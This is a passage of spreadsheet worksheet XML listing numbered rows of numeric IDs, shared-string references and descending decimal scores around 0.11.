        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="28686" ht="15.75" customHeight="1">
      <c r="A28686" s="1">
        <v>32626.0</v>
      </c>
      <c r="B28686" s="2">
        <v>5842912.0</v>
      </c>
      <c r="C28686" s="2" t="s">
        <v>27572</v>
      </c>
      <c r="D28686" s="2">
        <v>1.0</v>
      </c>
      <c r="E28686" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28686" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="28687" ht="15.75" customHeight="1">
      <c r="A28687" s="1">
        <v>725.0</v>
      </c>
      <c r="B28687" s="2">
        <v>2.0759512E7</v>
      </c>
      <c r="C28687" s="2" t="s">
        <v>27573</v>
      </c>
      <c r="D28687" s="2">
        <v>1.0</v>
      </c>
      <c r="E28687" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28687" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="28688" ht="15.75" customHeight="1">
      <c r="A28688" s="1">
        <v>11041.0</v>
      </c>
      <c r="B28688" s="2">
        <v>1.8050058E7</v>
      </c>
      <c r="C28688" s="2" t="s">
        <v>27574</v>
      </c>
      <c r="D28688" s="2">
        <v>1.0</v>
      </c>
      <c r="E28688" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28688" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="28689" ht="15.75" customHeight="1">
      <c r="A28689" s="1">
        <v>11870.0</v>
      </c>
      <c r="B28689" s="2">
        <v>2.4920035E7</v>
      </c>
      <c r="C28689" s="2" t="s">
        <v>27575</v>
      </c>
      <c r="D28689" s="2">
        <v>1.0</v>
      </c>
      <c r="E28689" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28689" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="28690" ht="15.75" customHeight="1">
      <c r="A28690" s="1">
        <v>14989.0</v>
      </c>
      <c r="B28690" s="2">
        <v>4.1416145E7</v>
      </c>
      <c r="C28690" s="2" t="s">
        <v>27576</v>
      </c>
      <c r="D28690" s="2">
        <v>1.0</v>
      </c>
      <c r="E28690" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28690" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="28691" ht="15.75" customHeight="1">
      <c r="A28691" s="1">
        <v>18917.0</v>
      </c>
      <c r="B28691" s="2">
        <v>5.420607E7</v>
      </c>
      <c r="C28691" s="2" t="s">
        <v>27577</v>
      </c>
      <c r="D28691" s="2">
        <v>1.0</v>
      </c>
      <c r="E28691" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28691" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="28692" ht="15.75" customHeight="1">
      <c r="A28692" s="1">
        <v>1502.0</v>
      </c>
      <c r="B28692" s="2">
        <v>2.7257141E7</v>
      </c>
      <c r="C28692" s="2" t="s">
        <v>27578</v>
      </c>
      <c r="D28692" s="2">
        <v>1.0</v>
      </c>
      <c r="E28692" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28692" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="28693" ht="15.75" customHeight="1">
      <c r="A28693" s="1">
        <v>31714.0</v>
      </c>
      <c r="B28693" s="2">
        <v>5210923.0</v>
      </c>
      <c r="C28693" s="2" t="s">
        <v>27579</v>
      </c>
      <c r="D28693" s="2">
        <v>1.0</v>
      </c>
      <c r="E28693" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28693" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="28694" ht="15.75" customHeight="1">
      <c r="A28694" s="1">
        <v>1706.0</v>
      </c>
      <c r="B28694" s="2">
        <v>2.8572219E7</v>
      </c>
      <c r="C28694" s="2" t="s">
        <v>27580</v>
      </c>
      <c r="D28694" s="2">
        <v>1.0</v>
      </c>
      <c r="E28694" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28694" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28695" ht="15.75" customHeight="1">
      <c r="A28695" s="1">
        <v>7612.0</v>
      </c>
      <c r="B28695" s="2">
        <v>5.1694068E7</v>
      </c>
      <c r="C28695" s="2" t="s">
        <v>27581</v>
      </c>
      <c r="D28695" s="2">
        <v>1.0</v>
      </c>
      <c r="E28695" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28695" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28696" ht="15.75" customHeight="1">
      <c r="A28696" s="1">
        <v>9011.0</v>
      </c>
      <c r="B28696" s="2">
        <v>5.4988816E7</v>
      </c>
      <c r="C28696" s="2" t="s">
        <v>27582</v>
      </c>
      <c r="D28696" s="2">
        <v>1.0</v>
      </c>
      <c r="E28696" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28696" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28697" ht="15.75" customHeight="1">
      <c r="A28697" s="1">
        <v>19685.0</v>
      </c>
      <c r="B28697" s="2">
        <v>5.6463046E7</v>
      </c>
      <c r="C28697" s="2" t="s">
        <v>27583</v>
      </c>
      <c r="D28697" s="2">
        <v>1.0</v>
      </c>
      <c r="E28697" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28697" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28698" ht="15.75" customHeight="1">
      <c r="A28698" s="1">
        <v>20752.0</v>
      </c>
      <c r="B28698" s="2">
        <v>1.4853074E7</v>
      </c>
      <c r="C28698" s="2" t="s">
        <v>27584</v>
      </c>
      <c r="D28698" s="2">
        <v>1.0</v>
      </c>
      <c r="E28698" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28698" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28699" ht="15.75" customHeight="1">
      <c r="A28699" s="1">
        <v>21859.0</v>
      </c>
      <c r="B28699" s="2">
        <v>2.7304329E7</v>
      </c>
      <c r="C28699" s="2" t="s">
        <v>27585</v>
      </c>
      <c r="D28699" s="2">
        <v>1.0</v>
      </c>
      <c r="E28699" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28699" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28700" ht="15.75" customHeight="1">
      <c r="A28700" s="1">
        <v>23456.0</v>
      </c>
      <c r="B28700" s="2">
        <v>5.6918359E7</v>
      </c>
      <c r="C28700" s="2" t="s">
        <v>27586</v>
      </c>
      <c r="D28700" s="2">
        <v>1.0</v>
      </c>
      <c r="E28700" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28700" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28701" ht="15.75" customHeight="1">
      <c r="A28701" s="1">
        <v>23774.0</v>
      </c>
      <c r="B28701" s="2">
        <v>7584722.0</v>
      </c>
      <c r="C28701" s="2" t="s">
        <v>27587</v>
      </c>
      <c r="D28701" s="2">
        <v>1.0</v>
      </c>
      <c r="E28701" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28701" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28702" ht="15.75" customHeight="1">
      <c r="A28702" s="1">
        <v>28427.0</v>
      </c>
      <c r="B28702" s="2">
        <v>2.6423679E7</v>
      </c>
      <c r="C28702" s="2" t="s">
        <v>27588</v>
      </c>
      <c r="D28702" s="2">
        <v>1.0</v>
      </c>
      <c r="E28702" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28702" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28703" ht="15.75" customHeight="1">
      <c r="A28703" s="1">
        <v>33322.0</v>
      </c>
      <c r="B28703" s="2">
        <v>7541753.0</v>
      </c>
      <c r="C28703" s="2" t="s">
        <v>27589</v>
      </c>
      <c r="D28703" s="2">
        <v>1.0</v>
      </c>
      <c r="E28703" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28703" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="28704" ht="15.75" customHeight="1">
      <c r="A28704" s="1">
        <v>18339.0</v>
      </c>
      <c r="B28704" s="2">
        <v>5.2423264E7</v>
      </c>
      <c r="C28704" s="2" t="s">
        <v>27590</v>
      </c>
      <c r="D28704" s="2">
        <v>1.0</v>
      </c>
      <c r="E28704" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28704" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="28705" ht="15.75" customHeight="1">
      <c r="A28705" s="1">
        <v>28660.0</v>
      </c>
      <c r="B28705" s="2">
        <v>2.7415565E7</v>
      </c>
      <c r="C28705" s="2" t="s">
        <v>27591</v>
      </c>
      <c r="D28705" s="2">
        <v>1.0</v>
      </c>
      <c r="E28705" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28705" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="28706" ht="15.75" customHeight="1">
      <c r="A28706" s="1">
        <v>34170.0</v>
      </c>
      <c r="B28706" s="2">
        <v>9923979.0</v>
      </c>
      <c r="C28706" s="2" t="s">
        <v>27592</v>
      </c>
      <c r="D28706" s="2">
        <v>1.0</v>
      </c>
      <c r="E28706" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28706" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="28707" ht="15.75" customHeight="1">
      <c r="A28707" s="1">
        <v>11135.0</v>
      </c>
      <c r="B28707" s="2">
        <v>1.9195767E7</v>
      </c>
      <c r="C28707" s="2" t="s">
        <v>27593</v>
      </c>
      <c r="D28707" s="2">
        <v>1.0</v>
      </c>
      <c r="E28707" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28707" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="28708" ht="15.75" customHeight="1">
      <c r="A28708" s="1">
        <v>25289.0</v>
      </c>
      <c r="B28708" s="2">
        <v>1.3403713E7</v>
      </c>
      <c r="C28708" s="2" t="s">
        <v>23970</v>
      </c>
      <c r="D28708" s="2">
        <v>1.0</v>
      </c>
      <c r="E28708" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28708" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="28709" ht="15.75" customHeight="1">
      <c r="A28709" s="1">
        <v>1192.0</v>
      </c>
      <c r="B28709" s="2">
        <v>2.4705276E7</v>
      </c>
      <c r="C28709" s="2" t="s">
        <v>27594</v>
      </c>
      <c r="D28709" s="2">
        <v>1.0</v>
      </c>
      <c r="E28709" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28709" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="28710" ht="15.75" customHeight="1">
      <c r="A28710" s="1">
        <v>3010.0</v>
      </c>
      <c r="B28710" s="2">
        <v>3.6338991E7</v>
      </c>
      <c r="C28710" s="2" t="s">
        <v>27595</v>
      </c>
      <c r="D28710" s="2">
        <v>1.0</v>
      </c>
      <c r="E28710" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28710" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="28711" ht="15.75" customHeight="1">
      <c r="A28711" s="1">
        <v>18706.0</v>
      </c>
      <c r="B28711" s="2">
        <v>5.3642806E7</v>
      </c>
      <c r="C28711" s="2" t="s">
        <v>27596</v>
      </c>
      <c r="D28711" s="2">
        <v>1.0</v>
      </c>
      <c r="E28711" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28711" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="28712" ht="15.75" customHeight="1">
      <c r="A28712" s="1">
        <v>24855.0</v>
      </c>
      <c r="B28712" s="2">
        <v>1.2205152E7</v>
      </c>
      <c r="C28712" s="2" t="s">
        <v>27597</v>
      </c>
      <c r="D28712" s="2">
        <v>1.0</v>
      </c>
      <c r="E28712" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28712" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="28713" ht="15.75" customHeight="1">
      <c r="A28713" s="1">
        <v>31672.0</v>
      </c>
      <c r="B28713" s="2">
        <v>5.1864419E7</v>
      </c>
      <c r="C28713" s="2" t="s">
        <v>27598</v>
      </c>
      <c r="D28713" s="2">
        <v>1.0</v>
      </c>
      <c r="E28713" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28713" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="28714" ht="15.75" customHeight="1">
      <c r="A28714" s="1">
        <v>33270.0</v>
      </c>
      <c r="B28714" s="2">
        <v>7409556.0</v>
      </c>
      <c r="C28714" s="2" t="s">
        <v>27599</v>
      </c>
      <c r="D28714" s="2">
        <v>1.0</v>
      </c>
      <c r="E28714" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28714" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="28715" ht="15.75" customHeight="1">
      <c r="A28715" s="1">
        <v>33752.0</v>
      </c>
      <c r="B28715" s="2">
        <v>8594239.0</v>
      </c>
      <c r="C28715" s="2" t="s">
        <v>27600</v>
      </c>
      <c r="D28715" s="2">
        <v>1.0</v>
      </c>
      <c r="E28715" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28715" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="28716" ht="15.75" customHeight="1">
      <c r="A28716" s="1">
        <v>14961.0</v>
      </c>
      <c r="B28716" s="2">
        <v>4.1335409E7</v>
      </c>
      <c r="C28716" s="2" t="s">
        <v>27601</v>
      </c>
      <c r="D28716" s="2">
        <v>1.0</v>
      </c>
      <c r="E28716" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28716" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="28717" ht="15.75" customHeight="1">
      <c r="A28717" s="1">
        <v>16632.0</v>
      </c>
      <c r="B28717" s="2">
        <v>4.7099203E7</v>
      </c>
      <c r="C28717" s="2" t="s">
        <v>27602</v>
      </c>
      <c r="D28717" s="2">
        <v>1.0</v>
      </c>
      <c r="E28717" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28717" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="28718" ht="15.75" customHeight="1">
      <c r="A28718" s="1">
        <v>1537.0</v>
      </c>
      <c r="B28718" s="2">
        <v>2.7542068E7</v>
      </c>
      <c r="C28718" s="2" t="s">
        <v>27603</v>
      </c>
      <c r="D28718" s="2">
        <v>1.0</v>
      </c>
      <c r="E28718" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28718" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="28719" ht="15.75" customHeight="1">
      <c r="A28719" s="1">
        <v>20862.0</v>
      </c>
      <c r="B28719" s="2">
        <v>1.5849526E7</v>
      </c>
      <c r="C28719" s="2" t="s">
        <v>27604</v>
      </c>
      <c r="D28719" s="2">
        <v>1.0</v>
      </c>
      <c r="E28719" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28719" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="28720" ht="15.75" customHeight="1">
      <c r="A28720" s="1">
        <v>25494.0</v>
      </c>
      <c r="B28720" s="2">
        <v>1.4071596E7</v>
      </c>
      <c r="C28720" s="2" t="s">
        <v>27605</v>
      </c>
      <c r="D28720" s="2">
        <v>1.0</v>
      </c>
      <c r="E28720" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28720" s="2">
        <v>0.1134920634920635</v>
      </c>
    </row>
    <row r="28721" ht="15.75" customHeight="1">
      <c r="A28721" s="1">
        <v>23822.0</v>
      </c>
      <c r="B28721" s="2">
        <v>7995748.0</v>
      </c>
      <c r="C28721" s="2" t="s">
        <v>27606</v>
      </c>
      <c r="D28721" s="2">
        <v>1.0</v>
      </c>
      <c r="E28721" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28721" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="28722" ht="15.75" customHeight="1">
      <c r="A28722" s="1">
        <v>3436.0</v>
      </c>
      <c r="B28722" s="2">
        <v>3.8213712E7</v>
      </c>
      <c r="C28722" s="2" t="s">
        <v>27607</v>
      </c>
      <c r="D28722" s="2">
        <v>1.0</v>
      </c>
      <c r="E28722" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28722" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28723" ht="15.75" customHeight="1">
      <c r="A28723" s="1">
        <v>16627.0</v>
      </c>
      <c r="B28723" s="2">
        <v>4.7070757E7</v>
      </c>
      <c r="C28723" s="2" t="s">
        <v>27608</v>
      </c>
      <c r="D28723" s="2">
        <v>1.0</v>
      </c>
      <c r="E28723" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28723" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28724" ht="15.75" customHeight="1">
      <c r="A28724" s="1">
        <v>17282.0</v>
      </c>
      <c r="B28724" s="2">
        <v>4.9210608E7</v>
      </c>
      <c r="C28724" s="2" t="s">
        <v>27609</v>
      </c>
      <c r="D28724" s="2">
        <v>1.0</v>
      </c>
      <c r="E28724" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28724" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28725" ht="15.75" customHeight="1">
      <c r="A28725" s="1">
        <v>18787.0</v>
      </c>
      <c r="B28725" s="2">
        <v>5.3827503E7</v>
      </c>
      <c r="C28725" s="2" t="s">
        <v>27610</v>
      </c>
      <c r="D28725" s="2">
        <v>1.0</v>
      </c>
      <c r="E28725" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28725" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28726" ht="15.75" customHeight="1">
      <c r="A28726" s="1">
        <v>20579.0</v>
      </c>
      <c r="B28726" s="2">
        <v>1.3668445E7</v>
      </c>
      <c r="C28726" s="2" t="s">
        <v>27611</v>
      </c>
      <c r="D28726" s="2">
        <v>1.0</v>
      </c>
      <c r="E28726" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28726" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28727" ht="15.75" customHeight="1">
      <c r="A28727" s="1">
        <v>25209.0</v>
      </c>
      <c r="B28727" s="2">
        <v>1.3225422E7</v>
      </c>
      <c r="C28727" s="2" t="s">
        <v>27612</v>
      </c>
      <c r="D28727" s="2">
        <v>1.0</v>
      </c>
      <c r="E28727" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28727" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28728" ht="15.75" customHeight="1">
      <c r="A28728" s="1">
        <v>26941.0</v>
      </c>
      <c r="B28728" s="2">
        <v>1.9556762E7</v>
      </c>
      <c r="C28728" s="2" t="s">
        <v>27613</v>
      </c>
      <c r="D28728" s="2">
        <v>1.0</v>
      </c>
      <c r="E28728" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28728" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28729" ht="15.75" customHeight="1">
      <c r="A28729" s="1">
        <v>28631.0</v>
      </c>
      <c r="B28729" s="2">
        <v>2.7245884E7</v>
      </c>
      <c r="C28729" s="2" t="s">
        <v>27614</v>
      </c>
      <c r="D28729" s="2">
        <v>1.0</v>
      </c>
      <c r="E28729" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28729" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28730" ht="15.75" customHeight="1">
      <c r="A28730" s="1">
        <v>31361.0</v>
      </c>
      <c r="B28730" s="2">
        <v>4987625.0</v>
      </c>
      <c r="C28730" s="2" t="s">
        <v>27615</v>
      </c>
      <c r="D28730" s="2">
        <v>1.0</v>
      </c>
      <c r="E28730" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28730" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="28731" ht="15.75" customHeight="1">
      <c r="A28731" s="1">
        <v>1658.0</v>
      </c>
      <c r="B28731" s="2">
        <v>2.8158353E7</v>
      </c>
      <c r="C28731" s="2" t="s">
        <v>27616</v>
      </c>
      <c r="D28731" s="2">
        <v>1.0</v>
      </c>
      <c r="E28731" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28731" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28732" ht="15.75" customHeight="1">
      <c r="A28732" s="1">
        <v>3843.0</v>
      </c>
      <c r="B28732" s="2">
        <v>4.0210476E7</v>
      </c>
      <c r="C28732" s="2" t="s">
        <v>27617</v>
      </c>
      <c r="D28732" s="2">
        <v>1.0</v>
      </c>
      <c r="E28732" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28732" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28733" ht="15.75" customHeight="1">
      <c r="A28733" s="1">
        <v>5067.0</v>
      </c>
      <c r="B28733" s="2">
        <v>4.4388055E7</v>
      </c>
      <c r="C28733" s="2" t="s">
        <v>27618</v>
      </c>
      <c r="D28733" s="2">
        <v>1.0</v>
      </c>
      <c r="E28733" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28733" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28734" ht="15.75" customHeight="1">
      <c r="A28734" s="1">
        <v>5703.0</v>
      </c>
      <c r="B28734" s="2">
        <v>4.6535003E7</v>
      </c>
      <c r="C28734" s="2" t="s">
        <v>27619</v>
      </c>
      <c r="D28734" s="2">
        <v>1.0</v>
      </c>
      <c r="E28734" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28734" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28735" ht="15.75" customHeight="1">
      <c r="A28735" s="1">
        <v>6473.0</v>
      </c>
      <c r="B28735" s="2">
        <v>4.866475E7</v>
      </c>
      <c r="C28735" s="2" t="s">
        <v>27620</v>
      </c>
      <c r="D28735" s="2">
        <v>1.0</v>
      </c>
      <c r="E28735" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28735" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28736" ht="15.75" customHeight="1">
      <c r="A28736" s="1">
        <v>14844.0</v>
      </c>
      <c r="B28736" s="2">
        <v>4.1051922E7</v>
      </c>
      <c r="C28736" s="2" t="s">
        <v>27621</v>
      </c>
      <c r="D28736" s="2">
        <v>1.0</v>
      </c>
      <c r="E28736" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28736" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28737" ht="15.75" customHeight="1">
      <c r="A28737" s="1">
        <v>14849.0</v>
      </c>
      <c r="B28737" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C28737" s="2" t="s">
        <v>27622</v>
      </c>
      <c r="D28737" s="2">
        <v>1.0</v>
      </c>
      <c r="E28737" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28737" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28738" ht="15.75" customHeight="1">
      <c r="A28738" s="1">
        <v>15413.0</v>
      </c>
      <c r="B28738" s="2">
        <v>4.2874953E7</v>
      </c>
      <c r="C28738" s="2" t="s">
        <v>27623</v>
      </c>
      <c r="D28738" s="2">
        <v>1.0</v>
      </c>
      <c r="E28738" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28738" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28739" ht="15.75" customHeight="1">
      <c r="A28739" s="1">
        <v>18470.0</v>
      </c>
      <c r="B28739" s="2">
        <v>5.2847441E7</v>
      </c>
      <c r="C28739" s="2" t="s">
        <v>27624</v>
      </c>
      <c r="D28739" s="2">
        <v>1.0</v>
      </c>
      <c r="E28739" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28739" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28740" ht="15.75" customHeight="1">
      <c r="A28740" s="1">
        <v>21209.0</v>
      </c>
      <c r="B28740" s="2">
        <v>1.9556763E7</v>
      </c>
      <c r="C28740" s="2" t="s">
        <v>27625</v>
      </c>
      <c r="D28740" s="2">
        <v>1.0</v>
      </c>
      <c r="E28740" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28740" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28741" ht="15.75" customHeight="1">
      <c r="A28741" s="1">
        <v>23133.0</v>
      </c>
      <c r="B28741" s="2">
        <v>5147250.0</v>
      </c>
      <c r="C28741" s="2" t="s">
        <v>27626</v>
      </c>
      <c r="D28741" s="2">
        <v>1.0</v>
      </c>
      <c r="E28741" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28741" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28742" ht="15.75" customHeight="1">
      <c r="A28742" s="1">
        <v>23972.0</v>
      </c>
      <c r="B28742" s="2">
        <v>9061792.0</v>
      </c>
      <c r="C28742" s="2" t="s">
        <v>27627</v>
      </c>
      <c r="D28742" s="2">
        <v>1.0</v>
      </c>
      <c r="E28742" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28742" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28743" ht="15.75" customHeight="1">
      <c r="A28743" s="1">
        <v>26455.0</v>
      </c>
      <c r="B28743" s="2">
        <v>1.731204E7</v>
      </c>
      <c r="C28743" s="2" t="s">
        <v>27628</v>
      </c>
      <c r="D28743" s="2">
        <v>1.0</v>
      </c>
      <c r="E28743" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28743" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28744" ht="15.75" customHeight="1">
      <c r="A28744" s="1">
        <v>29230.0</v>
      </c>
      <c r="B28744" s="2">
        <v>3.0827792E7</v>
      </c>
      <c r="C28744" s="2" t="s">
        <v>27629</v>
      </c>
      <c r="D28744" s="2">
        <v>1.0</v>
      </c>
      <c r="E28744" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28744" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28745" ht="15.75" customHeight="1">
      <c r="A28745" s="1">
        <v>29969.0</v>
      </c>
      <c r="B28745" s="2">
        <v>3609160.0</v>
      </c>
      <c r="C28745" s="2" t="s">
        <v>27630</v>
      </c>
      <c r="D28745" s="2">
        <v>1.0</v>
      </c>
      <c r="E28745" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28745" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28746" ht="15.75" customHeight="1">
      <c r="A28746" s="1">
        <v>30607.0</v>
      </c>
      <c r="B28746" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C28746" s="2" t="s">
        <v>27631</v>
      </c>
      <c r="D28746" s="2">
        <v>1.0</v>
      </c>
      <c r="E28746" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28746" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28747" ht="15.75" customHeight="1">
      <c r="A28747" s="1">
        <v>31848.0</v>
      </c>
      <c r="B28747" s="2">
        <v>5274287.0</v>
      </c>
      <c r="C28747" s="2" t="s">
        <v>27632</v>
      </c>
      <c r="D28747" s="2">
        <v>1.0</v>
      </c>
      <c r="E28747" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28747" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28748" ht="15.75" customHeight="1">
      <c r="A28748" s="1">
        <v>32437.0</v>
      </c>
      <c r="B28748" s="2">
        <v>5.6574715E7</v>
      </c>
      <c r="C28748" s="2" t="s">
        <v>27633</v>
      </c>
      <c r="D28748" s="2">
        <v>1.0</v>
      </c>
      <c r="E28748" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28748" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="28749" ht="15.75" customHeight="1">
      <c r="A28749" s="1">
        <v>1053.0</v>
      </c>
      <c r="B28749" s="2">
        <v>2.3444491E7</v>
      </c>
      <c r="C28749" s="2" t="s">
        <v>27634</v>
      </c>
      <c r="D28749" s="2">
        <v>1.0</v>
      </c>
      <c r="E28749" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28749" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28750" ht="15.75" customHeight="1">
      <c r="A28750" s="1">
        <v>2406.0</v>
      </c>
      <c r="B28750" s="2">
        <v>3.3452189E7</v>
      </c>
      <c r="C28750" s="2" t="s">
        <v>27635</v>
      </c>
      <c r="D28750" s="2">
        <v>1.0</v>
      </c>
      <c r="E28750" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28750" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28751" ht="15.75" customHeight="1">
      <c r="A28751" s="1">
        <v>2409.0</v>
      </c>
      <c r="B28751" s="2">
        <v>3.3469146E7</v>
      </c>
      <c r="C28751" s="2" t="s">
        <v>27636</v>
      </c>
      <c r="D28751" s="2">
        <v>1.0</v>
      </c>
      <c r="E28751" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28751" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28752" ht="15.75" customHeight="1">
      <c r="A28752" s="1">
        <v>2826.0</v>
      </c>
      <c r="B28752" s="2">
        <v>3.5395837E7</v>
      </c>
      <c r="C28752" s="2" t="s">
        <v>27637</v>
      </c>
      <c r="D28752" s="2">
        <v>1.0</v>
      </c>
      <c r="E28752" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28752" s="2">
        <v>0.1121212121212121</v>
      </c>
